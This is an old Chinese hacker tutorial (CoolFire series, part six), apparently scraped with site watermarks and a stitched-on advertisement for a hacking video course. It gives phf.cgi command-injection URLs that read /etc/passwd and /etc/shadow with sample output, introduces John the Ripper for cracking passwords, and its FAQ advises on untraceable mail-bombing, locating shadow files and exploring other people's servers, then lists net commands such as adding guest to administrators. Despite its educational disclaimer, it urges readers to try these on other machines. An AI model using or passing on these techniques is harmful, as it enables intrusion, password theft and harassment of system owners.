coolfire黑客入门教程系列之(六)
这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果
你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写
这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件
导致恶意入侵别人的电脑或网路, 本人概不负责!!
在昨天, 我们的首页造访人数破万了~~ 应该是增加了很多人, 而不是有人故意灌水的吧? 希望新
朋友们能喜欢我们的内容, 有人问到: 有没有跟我们首页性质相近的中文站台? 很遗憾的是目前
我还没有找到.... 看得到的大多是软体, 注册机之类的破解站台. 如果你也有这样的站台的话,
欢迎你写信给我们进行连结. 有很多网友报怨档案抓不下来, 先前我们已经尽了很大的努力将档
案放在国内Server 中, 我想, 由HiNet 连这边应该很快吧? 还是水管塞住的问题?? 如果有人
的位址在.edu.tw 附近的, 欢迎来信要求Mirror~~ 我很乐意将档案Mirror 给你, 让其它网
友更方便取这些档案.
好久没有再弄出一些文章出来了, 不过最近倒是回了蛮多关於Hacker 方面的问题, 也收到了许多
的回应信件, 有许多的问题在这一篇文章中都会有答案, 甚至到现在还有很多的网友们询问甚么https://www.doczj.com/doc/1814354112.html,
是shadow password 的, 请各位多翻翻以前的文章吧!! 在CGI Holes 方面的问题也很多, 所以在
这一篇之後我会找个时间写一写System Holes #2 来让大家对一些网路上常见的程式漏洞有一些基
本的认识.
最近有许多软体更新了, 最令我们注意的当然就是NT 4.0 罗, 因为它的更新肯定会带来很多的
人更新系统, 当然这样先进的作业系统我们还是很期待有人会很快的将它的Bugs 找出来的啦!!
UpYours 这套重量级的MailBomb 也出现的新的版本, 这次的V4.0 Beta 2 经试用後发现实在是
改进了很多, 但是相对的危险性也跟著提高, 其改用Delphi 来设计, 使得安装更为方便, 不过
美中不足的是beta2 的版本有些功能尚未改好, 光看到功能就让人哈翻了~~:) 这套beta2 的版
本目前在我们的首页上可以找得到, 相信它的正式版本很快就会完成~~
关於MailBomb: 我们的首页上所提供的MailBomb 仅供大家作为测试用, 请勿拿来开玩笑或是对别人
的信箱进行轰炸, 日前此类事件造成某些的ISP 当机, 慎至还有导致Mail Server 记忆体不足的情
况(哪个人这么狠??), 我们也发现最近网路越来越慢了, 因为水管上积了太多要跟我们抢宽度的垃圾
信件. 请大家以学习的心来使用这些Bombs... 不要没事就拿来炸人好吗?? Then enjoy new one~ 中国网管联盟www、bitsCN、com
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- [CGI Hole (phf.cgi) 的延伸]
这次的主题想了好久, 一直都没有想到, 不过日前有一个屋漏偏逢连夜雨的某国营事业, 在几经下X雨
及漏X的风波之後, 在他们的主机上发现了很好玩的状况, 原本我们在使用phf.cgi 来抓/etc/passwd
的时候, 在Browser 的Location 中是下:
https://www.doczj.com/doc/1814354112.html,/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:x:0:1:0000-Admin(0000):/:/sbin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nadm:x:45:2::/usr/bin:/sbin/sh
iuucp:x:46:5::/usr/lib/uucp/uucico:/sbin/sh https://www.doczj.com/doc/1814354112.html,
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
gopher:x:100:1::/usr/local/bin:/usr/local/bin/GopherUserScript
news:x:105:100::/usr/local/etc/innd:/usr/lib/rsh
ftp:x:106:101:Anonymous FTP:/export/ftp:/bin/false
hanshin:x:109:1::/home1/hanshin:/usr/lib/rsh
dayeh:x:110:1::/home1/dayeh:/usr/lib/rsh
ming:x:133:1::/home1/ming:/usr/bin/ksh
charlesl:x:139:1::/home1/charlesl:/usr/lib/rsh
iiimail:x:142:6::/home/iiimail:/usr/lib/rsh
charles.lo:x:156:1::/home1/charles.lo:/usr/lib/rsh
webmaster:x:161:1::/home1/webmaster:/usr/lib/rsh
mark:x:171:1::/home1/mark:/usr/lib/rsh
jcteam:x:172:1::/home1/jcteam:/usr/lib/rsh
ibgchen:x:224:1::/home1/ibgchen:/usr/lib/rsh
但是如果没有, 或是shadow 的话, 你可能会接著试:
https://www.doczj.com/doc/1814354112.html,/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/shadow
但是有时候虽然phf.cgi 这个程式的漏洞没有被补上, 还是有很多的机器不理会这个指令, 不过当这中国网管论坛https://www.doczj.com/doc/1814354112.html,
个指令生效, 但是你看到的却是一个shadow 过的passwd 的时候, 请不要灰心, 因为这台机器已经在
你的手中了, 为甚么呢?? 我们来玩看看一些简单的Unix shell command 你就会知道了~~ https://www.doczj.com/doc/1814354112.html,/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20-a%20/etc
Query Results
/usr/local/bin/ph -m alias=x /bin/ls -l -a /etc
total 466
-rw-r--r-- 1 root root 38 May 2 1996 #etcnamed.boot#
-rw-r--r-- 1 root root 20579 May 1 1996 #sendmail.cf#
drwxr-xr-x 11 root root 2048 Apr 17 13:07 .
drwxr-xr-x 24 root root 1024 Mar 26 08:16 ..
-rw-r--r-- 1 root root 2167 Aug 24 1995 DIR_COLORS
-rw-r--r-- 1 root root 15 May 1 1996 HOSTNAME
-rw-r--r-- 1 root root 4 Feb 24 1993 NETWORKING
-rw-r--r-- 1 root root 48 Dec 30 1994 NNTP_INEWS_DOMAIN
-rw-r--r-- 1 root root 0 May 13 1994 at.deny
drwxr-xr-x 2 root root 1024 Apr 11 1996 backups
-rw-r--r-- 1 root root 0 Feb 15 1994 csh.cshrc
-rw-r--r-- 1 root root 893 Apr 12 1996 csh.login
网管网bitsCN_com
drwxr-xr-x 2 root root 1024 Apr 16 1996 default
-rw-r--r-- 1 root root 154 Aug 21 1994 exports
-rw-r--r-- 1 root root 0 May 13 1995 fastboot
-rw-r--r-- 1 root root 1118 Jan 28 1994 fdprm
drwxr-xr-x 2 root root 1024 Apr 12 1996 fs
-rw-r--r-- 1 root root 250 Dec 9 19:19 fstab
-rw-r--r-- 1 root root 242 Dec 5 13:55 fstab~
-rw-r--r-- 1 root root 1915 Jan 27 07:46 ftpaccess
-rw-r--r-- 1 root root 368 Aug 1 1994 ftpconversions
-rw-r--r-- 1 root root 0 Aug 9 1994 ftpgroups
-rwxr-xr-x 1 root root 50 May 1 1996 ftponly
-rw-r--r-- 1 root root 501 Apr 26 1996 ftpusers
-rw-r--r-- 1 root root 76 Aug 21 1994 gateways
-rw-r--r-- 1 root root 669 May 19 1994 gettydefs
-rw-r--r-- 1 root root 291 Jun 6 1996 group
-rw-r--r-- 1 root root 27 Jul 7 1994 host.conf
-rw-r--r-- 1 root root 628 Jul 12 1996 hosts
-rw-r--r-- 1 root root 600 Jan 6 10:18 hosts.allow
-rw-r--r-- 1 root root 341 May 9 1996 hosts.deny
-rw-r--r-- 1 root root 313 Mar 16 1994 hosts.equiv 中国网管论坛https://www.doczj.com/doc/1814354112.html, -rw-r--r-- 1 root root 302 Sep 23 1993 hosts.lpd
-rw-r--r-- 1 root root 653 Apr 24 1996 hosts~
lrwxrwxrwx 1 root root 1 Apr 12 1996 inet -> .
-rw-r--r-- 1 root root 3677 Jan 6 10:20 inetd.conf
-rw-r--r-- 1 root root 3664 Apr 23 1996 inetd.conf~
-rw-r--r-- 1 root root 2351 Apr 18 1996 inittab
-rw-r--r-- 1 root root 2046 Jul 28 1994 inittab.gettyps.sample
-rw-r--r-- 1 root root 27 Apr 17 12:43 issue
-rw-r--r-- 1 root root 3 Apr 17 12:43 klogd.pid
-rw-r--r-- 1 root root 1223 Apr 17 12:43 ld.so.cache
-rw-r--r-- 1 root root 71 Aug 14 1995 ld.so.conf
drwxr-xr-x 2 root root 1024 Apr 12 1996 lilo
-rw-r--r-- 1 root root 479 Apr 13 1996 lilo.conf
-rw-r--r-- 1 root root 479 Apr 13 1996 lilo.conf.bak
-rw-r--r-- 1 root root 266 Apr 17 12:42 localtime
-rw-r--r-- 1 root root 76873 Oct 17 1995 magic
-r--r--r-- 1 root root 105 May 8 1994 mail.rc
-rw-r--r-- 1 root root 14 Apr 17 12:43 motd
drwxr-xr-x 2 root root 1024 Aug 1 1994 msgs
网管联盟https://www.doczj.com/doc/1814354112.html,
-rw-r--r-- 1 root root 833 Jun 29 1994 mtools
-r--r--r-- 1 root root 974 Apr 17 11:48 named.boot
-r--r--r-- 1 root root 2568 May 2 1996 named.boot,v
-r--r--r-- 1 root root 764 Mar 8 16:54 named.boot.v1
-r--r--r-- 1 root root 813 Mar 17 08:45 named.boot.v2
-r--r--r-- 1 root root 521 Apr 18 1996 named.boot.~1.3~
-r--r--r-- 1 root root 566 Apr 19 1996 named.boot.~1.4~
-r--r--r-- 1 root root 566 Apr 19 1996 named.boot.~1.5~
-r--r--r-- 1 root root 707 Mar 5 08:32 named.boot.~1.6~
-rw-r--r-- 1 root root 566 Apr 19 1996 named.boot~
-rw-r--r-- 1 root root 235 May 1 1996 networks
-rw-r--r-- 1 root root 237 Apr 24 1996 networks~
-rw-r--r-- 1 root root 0 May 8 1995 nntpserver
-rw-r--r-- 1 root root 36 Sep 12 1994 organization
-rw-r--r-- 1 root root 1727 Apr 17 13:07 passwd
-r--r--r-- 1 root root 1662 Apr 17 13:06 passwd-
-rw-r--r-- 1 root root 1715 Apr 17 13:06 passwd.OLD
-rw-r--r-- 1 root root 1494 Feb 12 14:22 passwd.old
-rw-r--r-- 1 root root 1354 Jun 6 1996 passwd~ 中国网管联盟https://www.doczj.com/doc/1814354112.html, drwxr-xr-x 2 root root 1024 Jul 9 1994 ppp
-rw-r--r-- 1 root root 2240 May 20 1994 printcap
-rw-r--r-- 1 root root 1083 Apr 12 1996 profile
-rw-r--r-- 1 root root 595 Aug 21 1994 protocols
drwxr-xr-x 2 root root 1024 Jan 3 23:59 rc.d
-rw-r--r-- 1 root root 41 May 1 1996 resolv.conf
-rw-r--r-- 1 root root 65 Jan 31 1996 resolv.conf~
-rw-r--r-- 1 root root 743 Aug 1 1994 rpc
-rw-r--r-- 1 root root 87 Jun 6 1996 securetty
-r--r--r-- 1 root root 20579 May 1 1996 sendmail.cf
-r--r--r-- 1 root root 21332 May 1 1996 sendmail.cf,v
-rw-r--r-- 1 root root 20541 Apr 13 1996 sendmail.cf~
-rw-r--r-- 1 root root 408 Apr 25 17:17 sendmail.st
-rw-r--r-- 1 root root 5575 Aug 1 1994 services
-rw-r--r-- 1 root root 68 Jun 6 1996 shells
drwxr-xr-x 3 root root 1024 Nov 13 1994 skel
-rw-r--r-- 1 root root 314 Jan 10 1995 slip.hosts
-rw-r--r-- 1 root root 342 Jan 10 1995 slip.login
-rw-r--r-- 1 root root 455 Aug 1 1994 snooptab
-rw------- 1 root users 524 Jul 18 1996 ssh_host_key 中国网管联盟https://www.doczj.com/doc/1814354112.html, -rw-r--r-- 1 root users 327 Jul 18 1996 ssh_host_key.pub
-rw------- 1 root users 512 Mar 10 09:03 ssh_random_seed
-rw-r--r-- 1 root users 607 Jul 18 1996 sshd_config
-rw-r----- 1 root root 501 Apr 26 1996 syslog.conf
-rw-r--r-- 1 root root 3 Apr 17 12:43 syslog.pid
-rw-r--r-- 1 root root 183942 Aug 9 1995 termcap
-rw-r--r-- 1 root root 126 Nov 24 1993 ttys
lrwxrwxrwx 1 root root 13 Apr 12 1996 utmp -> /var/adm/utmp
drwxr-xr-x 2 root root 1024 Aug 25 1995 vga
lrwxrwxrwx 1 root root 13 Apr 12 1996 wtmp -> /var/adm/wtmp
-rw-r--r-- 1 root root 76 May 8 1995 yp.conf.example
lrwxrwxrwx 1 root root 7 Apr 12 1996 zprofile -> profile
上面的%20 所代表的是[Space] 也就是空白键啦! 那上面这个Location 就如同我们已经Telnet 到
这台机器上, 下了: ls -l -a /etc 这个指令一样, 嗯... 也就是说....$^^*^$@@#
OK! 当你抓/etc/passwd 所抓到的是shadow 过的passwd 档, 你一定会要抓真正的shadow 档来作
"配对" 的动作... 所以呢, 下了ls 指令来找找看到底真的shadow 是藏在哪里, 当然你可以看的不
网管网bitsCN_com
只是/etc 这个目录, 任何目录你都可以看, 当然你可以使用的也不只是cat 及ls 这两个指令, 你
可以用更多的指令~~ 那么还有甚么作不到的呢??? 我想可能还是有很多哩~~ 因为phf.cgi 好像只
把你所下的指令丢给shell 後直接拦下它输出的结果, 也就是如果像是/bin/passwd userid 这样的
指令就不能用~ 因为它会要等你输入下一个字串~~ 除非先写入一个档案, 然後用来代入"<".. 嗯..
最近很忙, 没有空作这些无聊事, 不过phf.cgi 还真的蛮好玩的, 我已经试了好几台机器都可以看到
文件内容及档案, 目录... 当然~ 没有破坏就是了~~
经过这样的说明, 你是不是有些Idea ?? 还是记起以前有试过其它的机器的phf.cgi 也可以这样子
玩的?? 嗯~ 再连过去玩玩看吧! 发挥一下你的想像力~~ /etc/passwd 很容易就可以得手的喔~~ 对
了~ 不要乱搞政府机关or 你们的学校啦!!~~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- [Crack 工具介绍] John the Ripper V1.4 [Size:743K]
记得先前一直介绍大家使用CJack V1.4 来破解密码档, 那是因为它"够快", 在Encrypt 的速度及网管联盟https://www.doczj.com/doc/1814354112.html,
比对的速度上实在快了很多, 但是之後由於很多网友的作业环境是在Windows 95 之下, 所以Jack
不能跑, 我们就介绍大家使用John the Ripper V1.1 这个Passwrod Cracker~ 现在这套Cracker
出了新的版本了, 经过我们的试用觉得应该好好的为它介绍一番, 原来一直声称速度上比CJack14
还要快的John, 经过实际上的测试, 总感觉速度没有Jack 来得快, 虽然作者声称是因为他们这支
程式是以486 机器作最佳化的, 在386 上跑起来会比较慢, 但是旧的V1.1 实在是比Jack 还要慢
这也是大家都看得到的事实.
而 1.4 版在EnCrypt 上实在是下了点功夫, 也对Win32 版本有了支援, 当你下载解开後会发现里
面有DOS.ZIP WIN32.ZIP SOURCE.TGZ 这三个档, 分别是在DOS 下使用的版本, Win95,NT 下使用的
版本及Unix 下使用的版本, 这时针对你所运用的作业环境作个选择, 将档案解开即可直接使用.
你还要再解开COMMON.ZIP(共用档) 及DOC.ZIP(说明档), 经过测试速度上明显提升很多, 但是我不
敢讲它比Jack 要快多少, 至少在我的Pentium 133 的机器上跑起来觉得差不多, 也没有谁比较快
谁比较慢的感觉~~ 不过以这样的档案大小(7xxK) 能同时包含三种作业系统, 实在是不错的选择!! 中国网管联盟www、bitsCN、com
当然这个程式里面只含了一个小小的字典档供你测试, 想要发挥它最大的效能还是先要有一个不错的
字典档, 但是新的版本中可以让你设定自动产生序数及字串比对(之前的好像也有吧?), 至於如何操
作, 我想他跟Jack 及前一版本的操作方法相同, 就不用再多作介绍了~~ 以下是它的执行画面:
John the Ripper Version 1.4 Copyright (c) 1996,97 by Solar Designer
Usage: john [flags] [passwd files]
Flags: -pwfile:
-wordfile:
-rules enable rules for wordlist mode
-incremental[:
-single single crack mode
-external:
-restore[:
-makechars:
-show show cracked passwords
-test perform a benchmark
-users:
https://www.doczj.com/doc/1814354112.html,
-shells:[!]
-salts:[!]
-lamesalts assume plaintext passwords were used as salts
-timeout:
-list list each word
-beep -quiet beep or don't beep when a password is found
-noname -nohash don't use memory for login names or hash tables
-des -md5 force DES or MD5 mode
有没有看到最後一行? 有MD5 mode 的支援了哩~~~
嗯.. 介绍完了! 当然! 这支程式我们也传回来了, 你可以在我们的首页找到, 或者你也可以试
者archie 看看有哪些ftp site 有, 它的档名是ucfjohn3.zip ENJOY~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** CoolFire FAQ ****
许多东西没有空整理, 但是还是收集了一部分的问答出来, 如果这边有的就不要再来信询问了喔!!
[Q0]我抓了KOS 但是抓到1.2MB 左右就停了, 不晓得哪里还可以抓到.
[A0]如果你是想要我们站上KOS 中的字典档, 那么很报歉, 因为这东西只有本站的KOS 中有包, 中国网管联盟www_bitscn_com
在别的地方抓到的KOS 不含我们这个字典档(这是我们自己加料过的, 其它程式相同), 这也
是为甚么首页上的KOS 如此大了~ 如果你所要的是KOS 的程式, 那么你可以到https://www.doczj.com/doc/1814354112.html,
这个搜寻引擎中找"globalkos" 这个字串, 会有很多地下站台的列表, 接著你就可以在这些地
方找一个连线速度较快的主机抓取KOS 了~~
[Q1]我尝试用NETTERM 及LetMeIn 进入自己所建立的纟统(SCO Unix V).
1.因为帐号是本人的,所以我将密码放於在字典档第三行内.
2.在LetMeIn中选定我的字典档.
3.在NETTERM中输入我的帐号,然後按输入键.
4.在Password 的出现後回到LetMeIn.
5.按Start Break.
6.当Delay Time到了,键盘上的"NumLock"闪过不停,
不过,过了第三行(猜想... 很久)也没有反应.老是停在Password这个浮标傍.
7.当再选LetMeIn後看见字典档内的字逐一出现於最低的行内.
这好像没有按输入键.
请替我解答,可以么?
还想问问在那里可找到新的LetMeIn 及ClayMore版本
多谢帮忙. 网管网bitsCN_com
[A1]
1. 连上主机, 待user: 出现时不用输入你的user id.
2. 启动LetMeIn 1.0 选定字典档
3. 在Setup Keys 中输入你的User ID 并加上一个'~' 号(代表Enter
4. 在After Keys 中输入'~' 号, 表示密码输入完也要按Enter.
5. 按下Start Break, 在时间倒数完毕前将滑鼠点一下telnet (Netterm)
程式视窗, 等待自动输入~~~~ :)
ps... 以上.. 更正一下你的操作方式, 并请如果弄懂了LetMeIn 的操作
方式时帮我写一下说明... 因为有太多人的操作都错了~~ 不晓得是不
是我的说明写得太差了哩??? LetMeIn 及ClayMore 目前都未出新版本,
LetMeIn 2.0 的赶工还在加强中(有TCP/IP 部分的支援).
***
[Q2]我download了kabomb3.0,但又怕给查出来...我在网上有一个很嚣张的敌人呢![A2]KaBoom 3.0 经测试无法Fake IP, 所以很可能会被查出来~~~ 不过要看isp 配不配合抓~~~ 也就是说因为拨接是动态Ip, 较不容易查出(需透过ISP)...但是如
果是假借它人帐号拨接, 又要看电信局配不配合抓了.
[Q3]那么有没有完全不会被查出的email bomber呢?∶-)
[A3]Windows 上的AnonyMailer 就是了~~ 但没有强大的炸人功能~~ 用途为发一般https://www.doczj.com/doc/1814354112.html,
之匿名信件, 或是你可找Unix 上的Bomb Script..在Unix 上炸... 再不.. 就试
装UpYours 罗~:)
***
[Q4]I can't get the email bomb files except the kabomb..Can you help me
solve this problem?
[A4]You can download it from my site. If there's some problem, you can mail me~
***
[Q5] I trust that the GlobalKOS just down ..so I can get the KOS crack
files. Can you tell where I can get or put the file in your homepage?
Thanks you for you attention..
[A5]对~ 经过连结测试该Server 好像已经没有回应了, 目前已将Global KOS 档
案整理好放置於首页上供大家下载, 原先是遵重作者的反应不得放连结的, 现
在由於该Server 停掉了, 所以就将档案放上来罗~ 快抓吧!
***
[Q6]ShaDow 系唔系唔可以解o架!? 有o既话用边个程式呀? 点样先可以做到呢? [A6]You can use deshadow like program to De-Shadow the shadowed file.
Or you can use 'ypcat ' command to view the shadowed file.
But almost ISP have been fix the hole. Good Luck.
[Q7]我个ISP 用SUN/OS , D Sercuity 好劲o架! 我想睇D档案时, 会出现https://www.doczj.com/doc/1814354112.html, Permission Denied , 我咪用More / Less ! 然後用ftp 想睇, 用
又唔准! get file 都唔得! 我知个Passwd 档摆系边都罗唔到! 请问
你又有无办法去罗个档案啊!
[A7]SUN OS ?? You should to check that system again and tell me what version
is it ? And you should check what ftp deamon and what http deamon and
sendmail version. You should check everything about that server and try
to found every hole would be in that system. And try to get into the system.
After you get in. get more information from that server.
[Q8]我系你度罗o左个Guess Cracking Program ! 不过我都系唔知点样用! 我Upload
晒所有档案上去ISP Server 度! 然後就按cc -o guess getpwdent.c <-例如就
话我D规格错误! 搅到我用唔到!
[A8]some ISP did not support c compiler function. So you should check about it.
[Q9]点样o既档案先可以系SUN / OS 度用嫁? 我搅o黎搅去都整唔到执行档! 咪就系Guess 个程式罗!
[A9]Sun OS always use shadow program. And the shadowed file may not found in
中国网管联盟www、bitsCN、com
/etc directory, And may called '.shadow'. try found it in other directory.
[Q10]Global Kos 个Server 系咪有问题啊? 我上极去都上唔到啊! 如果唔介意可唔可以Attach个档案俾我啊?
[A10]There's a little problem to that server. and i think it have been shut-down
a while. So i will be put the program in my home page.
[Q11]Crack Jack 1.4 系唔系可以系Sun/Os Or Unix 度用o架? 我有个朋友叫我用系个Server 做Crack Password ! 但系我就唔知点样可以用DOS o既*.exe 档系SUN/Os OR UNIX 度执行!
[A11]CJack is running under dos mode. And it could not run under unix mode.
So if you want crack some password file. FTP it and put it into a dos OS
machine. Run CJack! 当然如果你坚持要在Unix 系统下跑的话, 还是有这种软体
的, 最近新版的John the Ripper V1.4 就有附Source Code 可以让你在你的主机
上面Compiler.... 但前提是你必须要有 c compiler 的权限呀~~ 快找一台机器吧!
***
[Q12]我对hacker这门课有些兴趣(虽然我一窍不通:-P ).想请教您几个问题:
我使用" John the Ripper V1.0 " 来crack一个名叫"passwd"的密码档, 中国网管联盟www_bitscn_com
但是很奇怪的,我执行後,显示了一些字,就跳回DOS了.好像根本没有执行crack的动作.
您能帮小弟找出原因吗?
画面如下:
C:\Hacker>john -beep -w:123.txt passwd
John the Ripper Version 1.0 Copyright (c) 1996 by Solar Designer
Loaded 0 accounts with 0 different salts
C:\Hacker>
123.txt是"字典档"(其实是四,五十个ID); passwd则是我们的"目标:密码档.
[A12]很正确的指令, 不过0 accounts with 0 different salts 就有点怪了~~~
据我的判断你的passwd 档是shadow 过的档, 没有用~~~~ 所以John 找不到
"有效的" 资料来判读~~~ 新版的John 有一个UnShadow.exe 的档案, 据说可
用来组合shadow 及passwd 使其还原, 不过前提还是要两个档都抓到, 如果
只抓到一个档是没有用的!! 记得上次有个软体声称其注册版可以解shadow..
应改也是必需要先抓到shadow 档吧!~~ 不过这好像没有甚么意义呀~~
[Q13]您听过一个叫: LANWATCH 的软体吗? 我听说它可以:过滤(拦截)Internet上的封包
资料,并可"监视"使用者的一举一动?! 哇!!!太帅了!您有它的相关资料吗?
[A13]No~~ 没玩过~~ 不过你是用拨接上线吗??? 那就别想了~~~~:) https://www.doczj.com/doc/1814354112.html,
[Q14]我这里有个浏览器的Bomb(用java写的).据我自己(太牺牲了...)的测试,不论你是
用Netscape或MSIE, 它都会让你的浏览器一直重复开很多个视窗,直到记忆体耗完
为止!!! :-P 不知您有无兴趣想要看看?
[A14]我也有个可FORMA T C: 的JA VA... 不过没用就是了~~ 哈哈~ 这种东西少玩....
我宁愿多破几间站台~~~ 嘻::::::: 快把Java Option 关掉吧! 免得以後看我的
Page 会Formatting ?? <-- 开玩笑啦~~~
***
[Q15] 感谢您在网页上的资讯造福了我们这些刚入门的新手^_^
根据您提供的方法,成功的取得Linux.xxxxxxx.xxxx.xxx.tw 的/etc/passwd 并找出n
个password ..... 但我在https://www.doczj.com/doc/1814354112.html,.tw 却碰了大钉子...:(
他们的/etc/passwd 是shadows 的, 我猜真正的password 可能在/etc/master.passwd
, 但我没权限读取它.... 经尝试了您网页提供的3 个Unix & Linux 的漏洞仍无效.
不知您有没有方法解决被shadow 的passwd....??
提供一个帐号您可进去看 ... login: ****** password: **** (这是淡大的密码格
式: 4位数字) 另,在bbs 的security 版有人提出现在的www cracker 法:
www.xxx.xxx/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd 问题是出在phf , 您知不
https://www.doczj.com/doc/1814354112.html,
知道他的意思?
[A15] phf 的漏洞是在於phf 本身自己的Bug, 它并不会检查你的UID, 且它执行了system()
这个指令, 所以我们就可以利用它来作一些只有root 才可以作的一些事情, 这是一个很
大的漏洞, 现在很多ISP 都已经将此漏洞补上了~~~~ 这一篇文章中的说明应该就很清楚了吧??
**** 後语****
** 不要Crack 这个首页的ISP!!!! 否则FETAG Sofeware's Hacking Page 将会完全关闭, 再
也不寻找其它的地方来放置, 希望给你的是使用电脑的"知识", 不要利用它来夺取任何的"权利", 本首页著重的是教育, 而不是一的教导攻击的方法, 希望大家对於政府机关(org.tw) 或教育机构(edu.tw) 不要作任何的破坏!! 还有我的ISP......:D 谢谢大家的支持~
------
我们的首页上日前更新後增加一个网友交流板, 这个板的目的是让网友们可以在上面作些讨论, 如果
你常上我们的首页, 请看一下板上有没有问题是你能够回答的? 如果有也请不吝啬的发言, 造福大家
喔~~ 网友交流板需要你的支持~~
------
再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的, 不主张你随
便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上(又... 如果第三次世界
网管网https://www.doczj.com/doc/1814354112.html,
大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持), 最严重的情况(如果你真的很讨厌该主
机的话)... 就将它Shut Down.... 好了! 别太暴力了!
【转自https://www.doczj.com/doc/1814354112.html,】
你好朋友 百度收索看【紫风剑客黑客入门教程】 是由黑基团队10个黑客高手呕心沥血编写的教程 包括从入门到精通全三套高清视频教程和高手进阶脚本电子书! 全套还包括我们团队全套内部vip黑客工具 工具包包括编,壳,攻,防所有类型的黑客软件! 听说紫风剑客黑客教程都是视频形式的,课程通俗易懂只要会打字就能学会不需要基础,由浅入深, 很火。并且课程的内容会随着技术的更新而更新,因为没有课程终结这个说法。并且他们有YY讲课,有不懂的地方24小时为你服务 学习黑客需要有耐心,要有全套的教程,才可以学会,首先要有视频 讲解,靠个人的参悟是很难学会的,下面了解下学习黑客的步骤: 一、前期 1、了解什么是黑客,黑客的精神是什么。当然了解一下几大着 名黑客或骇客的“发家史”也是很有必要的。 2、黑客必备的一些基础命令,包括DOS命令,以及UNIX / Linux 下的命令。 3、远程扫描、远程刺探技术。包括通过系统自带命令的信息刺 探以及使用工具扫描等。 4、密码破解。了解现在的密码破解的适用范围,以及操作技巧 等等。 5、溢出攻击。溢出工具的使用方法。 6、注入攻击。注入攻击只是一个简称,这里还要包括XSS、旁注 、远程包含等一系列脚本攻击技巧。 7、学会各种编译工具的使用方法,能编译所有ShellCode。 8、学会手动查杀任何木马、病毒,学会分析Windows操作系统, 以使自己百毒不侵。 二、中期 1、学习所有Windows下服务器的搭建步骤(ASP、PHP、JSP)。 2、掌握例如Google黑客、cookies 、网络钓鱼、社会工程学等 等等等。 3、学习HTML、JavaScript、VBScript。 4、学习标准SQL语言,以及大多数数据库的使用。 5、学习ASP,并拥有发掘ASP脚本漏洞的能力。 6、学习PHP,并拥有发掘PHP脚本漏洞的能力。 7、学习JSP,并拥有发掘JSP脚本漏洞的能力。 8、学习掌握最新脚本的特性性以及发掘漏洞的方法,例如眼下 的WEB2.0。 三、后期 1、确定自己的发展方向
前言:你是不是很想做黑客呢?是不是经常周游于各个黑客站点呢?学黑客是真的很难的!它需要你有足够的耐性!毅力!只有持之以恒才能有所成就!好了~灌了那么多的水,下面就开始吧!注意:本文只适合新手!已入门的请去看别的技术文章吧!下面就用我仅仅知道的知识让你们取得第一次的成功吧!\\操作系统拜托你装个2000的好不好?不要再问为什么了~\\(本文注释用"\\注释内容\\"标记! 第一节课:命令的使用 你必须懂得一些命令才能更好地运用!总不能一边入侵一边去看例文吧!(什么?你喜欢?我晕了~)好了~下面就看看一些常用的命令吧!也就是入侵必须懂得的基本命令!如果你连这都栏得看的话你就可以放学了~放你的长假去吧! https://www.doczj.com/doc/1814354112.html, NET [ ACCOUNTS │COMPUTER │CONFIG │CONTINUE │FILE │GROUP │HELP │ HELPMSG │LOCALGROUP │NAME │PAUSE │PRINT │SEND │SESSION │ SHARE │START │STA TISTICS │STOP │TIME │USE │USER │VIEW ] 上面就是net命令.你可以在cmd下键入net/?获得.我们看看一些常用的. net user \\列举所有用户\\ 例子:c:\>net user net localgroup \\把用户分组\\ 例子:c:\>net localgroup administrators guest /add \\把guest 用户加到管理组.需要有足够的权限才能进行操作!\\ net share \\显示共享资源\\ 例子:c:\>net share net start \\启动服务,或显示已启动服务的列表\\ 例子:\>net start 例子:\>net start telnet \\启动telnet\\ net stop \\停止Windows2000网络服务\\ 例子c:\>net stop telnet \\停止telnet服务\\ net time \\显示时间\\ 例子:c:\>net time 127.0.0.1 \\显示127.0.0.1的时间\\ net use \\显示关于计算机连接的信息\\ 例子:c:\>net use net view \\显示域列表、计算机列表或者由指定计算机共享的资源\\ 例子:c:\>net view net的基本命令就到此结束吧!但并不是说其它的命令不用去学!只是我的基本教学(入侵)
